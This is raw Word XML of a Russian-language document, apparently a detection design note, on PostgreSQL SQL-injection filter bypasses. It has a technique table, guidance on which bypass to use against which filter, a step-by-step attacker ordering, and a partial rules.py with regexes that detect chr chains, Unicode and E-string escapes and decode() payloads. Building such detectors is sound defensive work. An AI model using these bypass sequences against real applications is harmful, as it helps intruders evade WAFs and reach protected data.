              <w:t>decode(hex)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1CF490" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>длинные строки, без повторных escape</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DF0004" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>53</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109324" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">длинная hex заметна в логах; для имени — через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EXECUTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7F1DDC9E"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B83D4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.9.6 whitespace</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43A64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\s+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> между keywords</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0E77E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a (не для имён)</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8DAC75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">точка инъекции должна быть вне </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'...'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-литерала</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7537B9D3"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A58A9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.9.7 CVE-2025-1094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C3948E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>сам libpq escape</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26FE87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a</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FF4CF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>только chain через psql, не серверный SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75E0D2A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Выбор приёма по контексту:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE4C60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Фильтр на содержимое литерала (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'pg_authid'</w:t>
      </w:r>
      <w:r>
        <w:t>) → 3.9.2 / 3.9.3 / 3.9.4 / 3.9.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C4D484" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Фильтр на апостроф (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>) → 3.9.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419BD65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Фильтр на ключевые слова (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t>) → 3.9.6 (whitespace, case, alt-tautology).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83A5AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Фильтр на функции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:r>
        <w:t>) → 3.9.3 (escape-литералы, без function call).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777E3D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Фильтр на E-prefix → 3.9.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t>) или 3.9.5 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BC071" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Фильтр на backslash (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) → 3.9.3 с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C257A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Длинные строки → 3.9.5 (компактнее всех остальных).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA9D978" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Имена функций/таблиц вместо значений → 3.9.2 Payload B / 3.9.5 Payload C (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в DO) или 3.9.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t>-identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220899CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0112B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атакующий после нахождения точки инъекции и распознавания фильтра идёт по такому порядку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27377D4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.6 (whitespace + case)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пробует первым: дешевле всех, не требует function call. Если WAF не нормализует whitespace/case, готово.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CEBAC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.1 (dollar-quote)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если фильтр на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>-кавычки; быстро ломает apostrophe-sanitizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF5868" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.3 (Unicode-escape) или 3.9.4 (E-strings)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если нужно скрыть содержимое значения (литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'pg_authid'</w:t>
      </w:r>
      <w:r>
        <w:t>); по выбору — какой синтаксис фильтр пропускает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F3C89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.5 (decode hex/base64)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для длинных строк (≥30 байт) или когда нужна максимально компактная форма; пограничный случай — стек уже комбинирует 3-4 приёма, decode упрощает payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD23ACC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.2 (chr) + DO + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — последний резерв, когда фильтр блокирует и E-prefix, и U&amp;, и decode; chr — единственный приём, который тривиально статистически детектируется, но самый универсальный.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382674A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.7 (CVE-2025-1094) не часть этого пайплайна — это отдельный класс эксплуатации против цепочек через psql, не против WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365634FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса FILTER_BYPASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B8D3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сводный regex по техникам 3.9.1–3.9.6. 3.9.7 не включается: CVE-2025-1094 — баг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>клиентской libpq</w:t>
      </w:r>
      <w:r>
        <w:t>, не серверного SQL; на стадии, когда payload доходит до judge-а, он уже валиден серверу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5B035" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Две ветки (high/mid) с разным базовым риском:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E659554"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5A1E9A92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CB1D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDEBCE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FILTER_BYPASS = "filter_bypass"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2200B352" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC1161"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6E637FBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.FILTER_BYPASS: 6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A287D21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E554469"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282E5FDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"filter_bypass_high": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16207489" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.2 chr-цепочка ≥3 звеньев</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762357AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:\bchr\s*\(\s*\d+\s*\)\s*\|\|){2,}|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E7729F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.3 U&amp;'...' или U&amp;"..." с &gt;=2 codepoint-ами подряд</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E251174" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"U&amp;['\"](?:\\[0-9a-fA-F]{4}){2,}|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B8B38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.4 E'\xNN...' или E'\NNN...' с &gt;=2 byte-escape подряд</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB8DBC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bE['\"](?:\\(?:x[0-9a-fA-F]{2}|\d{3})){2,}|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D3510E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.5 decode-hex с длинной hex-строкой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D96D0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bdecode\s*\(\s*['\"][0-9a-fA-F]{20,}['\"]\s*,\s*['\"]hex['\"]\s*\)|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538E223" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.5 decode-base64 с длинной base64-строкой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324839D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bdecode\s*\(\s*['\"][A-Za-z0-9+/]{16,}={0,2}['\"]\s*,\s*['\"]base64['\"]\s*\)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF16B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647733C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C098C0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"filter_bypass_mid": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E516C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
